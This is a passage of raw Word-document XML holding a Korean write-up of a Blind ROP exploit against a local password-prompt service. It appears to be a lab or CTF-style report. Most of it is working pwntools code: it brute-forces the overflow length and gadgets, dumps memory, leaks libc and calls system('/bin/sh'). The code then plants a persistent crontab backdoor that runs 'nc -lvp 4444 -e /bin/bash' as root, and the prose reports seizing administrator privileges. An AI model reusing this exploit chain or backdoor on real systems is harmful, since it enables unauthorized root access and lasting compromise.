          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>puts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library</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 주소를 유출한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7EFA82" w14:textId="074E499C" w:rsidR="002346CF" w:rsidRDefault="004A7AE9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유출된 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>puts_got</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 주소와 라이브러리의 </w:t>
      </w:r>
      <w:r w:rsidR="002346CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>오프셋</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 뺄셈하여 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>library</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>base address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:r w:rsidR="002346CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 계산한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A48A3" w14:textId="41915240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여기서 나오는 값은 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>puts</w:t>
      </w:r>
      <w:r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시작주소이다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi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1149C2DB" w14:textId="77777777" w:rsidTr="002145E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47CF16F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find_libc(s, over_len, stop_gadget, pop_rdi, puts_plt, puts_got):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EAFE5B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# find server libc address using puts_plt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0D0A0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s.recvuntil('password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2846995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= 'a'*over_len</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37748C1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p64(pop_rdi)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D3056F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p64(0x601018)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1285AD3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p64(puts_plt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D53864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p64(stop_gadget)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="785417F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s.sendline(pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D27DFA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l_base = u64(s.recv(6).ljust(8, '\x00'))-l.symbols['puts']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DBB043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log.info('l_base: {}'.format(hex(l_base)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51FDD10D" w14:textId="71A685C4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return l_base</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51BB95E4" w14:textId="584A741A" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9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3B54DF50" w14:textId="77777777" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9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49302D66" w14:textId="1764710F" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">최종 </w:t>
      </w:r>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F18EF" w14:textId="1C66A0E6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위 과정들을 종합하여 최종 익스플로잇 코드를 작성한다.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145E3" w14:paraId="2F227D0D" w14:textId="77777777" w:rsidTr="002145E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="029D92C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from pwn import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72157FB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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DD06C2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#context.log_level = 'debug'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FD16C8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l = ELF('/lib/x86_64-linux-gnu/libc-2.23.so', checksec=False) # libc information load</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="203D73E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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7093238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base = 0x400000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57C6D30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019982A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 find overflow point in binary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="793586A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find_overflow():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="157C5E1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for i in xrange(1, 0x1000):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F31484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00AEBC0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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A7082D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send 'a' repeatedly increasing 1 to find overflow point</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5958E06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s.sendline('a'*i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A4BFD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s.recvuntil('game\n', timeout=1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68610D7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if we got a EOFError, that's a overflow point, print and close the connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4FB24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0277324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log.info('overflow length: {}'.format(i-1))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31D0713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2494E16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return i-1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E988F7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s.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC416D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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26AD8E9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lastRenderedPageBreak/>
              <w:t>def find_stop(over_len):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B436E06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14E0C71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i%100 ==0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E43121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log.info('try.. {}'.format(i))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E1956B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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D2189D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3AB10C1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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="352A91A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</w:t>
            </w:r>
            <w:r w:rsidRPr="002346CF">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">    # send a overflow data with return address overwrite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D2344D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at this point, return address are increasing repeatedly same above based 0x400000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D15697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s.sendline('a'*over_len+p64(base+i))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="097ACC6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47002F4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6D23C3C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log.info('data: {}'.format(data))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1019F66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if we got a 'password' in stdout, that means come back to the main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F0F33F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if "password" in data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1549ADC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log.info('stop gadget: {}'.format(hex(base+i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="469C685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795C6CA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return base+i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C2588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# if we got a EOFError, that means connection is close without back to the main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FCC177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33AD7FA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22063B4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find_maybe_brop(over_len, stop_gadget):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641DBD7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63FA0C1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i%0x100 == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AAEBF5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lastRenderedPageBreak/>
              <w:t xml:space="preserve">            log.info('try.. {}'.format(hex(i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CEF8FD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3D6F565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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7350636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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E01724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find pop*6 ret gadget</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4889F95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with six 64bit data and stop gadget, if base+i is pop*6, the binary come back to the main</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="702E651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= 'a'*over_len</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EE8832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p64(base+i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78FBABA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p64(0)*6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F532F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p64(stop_gadget)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB1B73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s.recvuntil('password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02CE0E9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s.sendline(pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3611D85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s.recvuntil('password?\n', timeout=0.2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A68C7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# if binary come to the main, base+i is two cases</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41681E9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one is pop*6; imul; call ~~</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="526AE49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two is pop*6; ret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69CF7AB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we want to base+i is two</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A3E23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if 'password' in data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="452993F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log.info('maybe brop gadget: {}'.format(hex(base+i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="671D877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72E22D2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gadget = find_brop(over_len, base+i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69EA297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if gadget:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5745E2B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    return base+i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F18806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5A036A3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500E24D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find_brop(over_len, addr):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49A8C8D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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B2DAD6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># when code without stop gadget, if binary got a EOFError, base+i is pop*?;ret gadget</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5263402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 = connect('localhost', 10001, level='error') # connect to server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44A2223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 = 'a'*over_len</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B077B5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 += p64(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0913668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 += p64(0x41)*10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48517CD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s.sendline(pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79304E7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data = s.recvuntil('password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3E910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data = s.recvuntil('password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="744DBDA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'password' in data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6572D91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01FFEEC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return 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5278E9F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except EOFError:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B48B1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log.info('find brop gadget: {}'.format(hex(addr)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4049B4F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s.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66B07B56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return addr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B788C0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find_puts(over_len, pop_rdi):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A9FBC3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for i in xrange(0, 0x1000):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D041FC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i%0x100 == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0244367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log.info('try.. {}'.format(hex(i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DEA41E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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EEF307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find puts_plt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6923CF4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 = connect('localhost', 10001, level='error') # connect to server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD4971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= 'a'*over_len</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB5FAB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p64(pop_rdi)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03602DC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p64(0x400000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC7EE8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pay += p64(base+i)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60175BD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s.sendline(pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2BC91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s.recvuntil('\x7fELF')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59CE136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if we got a \x7fELF (ELF Format Magic Byte), base+i is a puts_plt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51CA47A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 xml:space="preserve">    # and this means we are able to leak binary in the server !</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="582CB71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if '\x7fELF' in data:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46783E1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log.info('puts%plt: {}'.format(hex(base+i)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DF2478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s.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22ADE93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    return base+i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04D8DC8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># if nothing print in the stdout, fails</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E907F4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EOFError:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="586ECF8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s.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E1B817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7042D13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memory_dump(size,stop_gadget,rdi_ret,put_plt):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6188D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now = base</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ECB9A2B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end = 0x401000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33E612F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dump = ""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C72D2D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while now &lt; end:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C10648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now % 0x100 == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BECFBF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log.info("Progressed to  0x%x" % now)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D89F3E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ab/>
              <w:t># dump binary using puts_plt from the 0x400000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605E332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= ''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18DDBB16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+= 'A' * size</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5EF2E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+= p64(rdi_ret)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E98DBA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+= p64(now)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192EC8A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+= p64(puts_plt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D41FE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payload += p64(stop_gadget)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED8E97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r = remote('localhost', 10001, level='error')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3280459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r.recvuntil('WelCome my friend,Do you know password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DFA1B1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r.sendline(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EED9FB6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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D14F40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r.recv(timeout=0.5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E3054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r.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B4DCF4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data[:data.index("\nWelCome")]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0314CA6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ValueError as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA4B5F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data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CE4BC0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except Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0F96A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continue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6713E47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if len(data.split()) == 0:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01310BBE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    data = '\x00'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="519C2F52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dump += data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FD0389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now += len(data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2217584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with open('memory.dump','wb') as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74A1DBB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    f.write(dump)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0077632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find_libc(s, over_len, stop_gadget, pop_rdi, puts_plt, puts_got):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F23E7A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# find server libc address using puts_plt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F7A9749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s.recvuntil('password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D0A919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= 'a'*over_len</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="597FAE3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p64(pop_rdi)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="124C1AF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p64(0x601018)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CB3A0D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p64(puts_plt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="622F396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p64(stop_gadget)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48B99BE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s.sendline(pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="139DC57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l_base = u64(s.recv(6).ljust(8, '\x00'))-l.symbols['puts']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26ACCE4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log.info('l_base: {}'.format(hex(l_base)))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7168A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return l_base</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FC8D516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def ex(s, over_len, pop_rdi, binsh, system, stop_gadget):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A3A7F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# finally exploit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F6EF1F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s.recvuntil('password?\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E455EA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= 'a'*over_len</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="764D294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p64(pop_rdi)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09353EF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p64(binsh)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ABD702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p64(system)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="308493FC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pay += p64(stop_gadget)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="692E022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#pause()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2514DF85" w14:textId="0352058C" w:rsid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s.sendline(pay)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CAB8F11" w14:textId="66BFA679" w:rsidR="004A7AE9" w:rsidRPr="002346CF" w:rsidRDefault="004A7AE9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   s.sendline(“echo ‘ * * * * * root nc -lvp 4444 -e /bin/bash &gt; /etc/crontab”)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCFACE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 xml:space="preserve">    s.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3628437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#over_len = find_overflow()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B07B7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#stop_gadget = find_stop(over_len)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A7CE17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over_len = 72</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E2614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stop_gadget = 0x4005c0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EBAD2D5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pop_rdi = 0x4007c3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="103720C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puts_plt = 0x400560</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DF04AD4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puts_got = 0x601018</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76738220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s = connect('localhost', 10001)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4854010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l_base = find_libc(s, over_len, stop_gadget, pop_rdi, puts_plt, puts_got)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B8700A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system = l_base + l.symbols['system']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13AF0B33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binsh = l_base + 0x18cd57</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D4D55A8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ex(s, over_len, pop_rdi, binsh, system, stop_gadget)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ADBD55D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#puts_plt = find_puts(over_len, pop_rdi)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E9527A1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#memory_dump(over_len, stop_gadget, pop_rdi, puts_plt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1E12F7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#brop_gadget = find_maybe_brop(over_len, stop_gadget)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BCA98DF" w14:textId="77777777" w:rsidR="002145E3" w:rsidRPr="002346CF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#pop_rdi = brop_gadget + 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C6C3B10" w14:textId="5723B46F" w:rsidR="002145E3" w:rsidRPr="002145E3" w:rsidRDefault="002145E3" w:rsidP="002145E3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 w:rsidRPr="002346CF">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
              </w:rPr>
              <w:t>#log.info('pop_rdi: {}'.format(hex(pop_rdi)))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BE62B87" w14:textId="7820C9E8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</w:p>
    <w:p w14:paraId="1CEED0D4" w14:textId="4514A45F" w:rsidR="002346CF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 w:rsidRPr="002346CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D79D2D0" wp14:editId="3AD9FB0C">
            <wp:extent cx="5731510" cy="1671320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="6" name="내용 개체 틀 5">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F70FF37D-8AE2-4406-883A-574E9FB17A0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내용 개체 틀 5">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F70FF37D-8AE2-4406-883A-574E9FB17A0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344" w14:textId="7AF9DBE6" w:rsidR="004A7AE9" w:rsidRDefault="002346CF" w:rsidP="002346CF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF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성공적으로 관리자 권한을 탈취한 것을 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBD5F33" w14:textId="70BD347F" w:rsidR="002346CF" w:rsidRPr="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="굴림"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0AAB74" w14:textId="508653B9" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="1000" w:hanging="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격 후 지속되는 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C46B83F" w14:textId="1AACB22E" w:rsidR="004A7AE9" w:rsidRPr="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자 권한을 탈취한 후 지속되는 공격을 진행할 수 있도록 /</w:t>
      </w:r>
      <w:r>
        <w:t>etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 백도어를 심는다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA69F0" w14:textId="6E3C5F2E" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A610282" wp14:editId="1E08BEA4">
            <wp:extent cx="5731510" cy="3420110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="4" name="그림 4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6B10" w14:textId="5D2A7573" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">매 </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">분마다 </w:t>
      </w:r>
      <w:r>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 포트로부터 접속을 대기하도록 백도어를 심고 결과를 확인한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E894AB" w14:textId="359C406F" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9"/>
    <w:p w14:paraId="4660B3C5" w14:textId="43850B8B" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="279CE15B" wp14:editId="5ADBF64F">
            <wp:extent cx="5731510" cy="2534920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4098" name="Picture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F073AF1-E8F0-4DCC-A5F3-B3A006781D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F073AF1-E8F0-4DCC-A5F3-B3A006781DCE}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89AFA" w14:textId="3D5FAEB7" w:rsidR="004A7AE9" w:rsidRDefault="004A7AE9" w:rsidP="004A7AE9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">다음과 같이 </w:t>
      </w:r>
      <w:r>
        <w:t>4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
